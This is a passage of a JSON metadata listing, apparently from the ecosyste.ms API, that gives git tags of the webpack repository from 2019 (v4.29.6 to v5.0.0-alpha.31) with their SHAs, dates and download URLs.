arsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4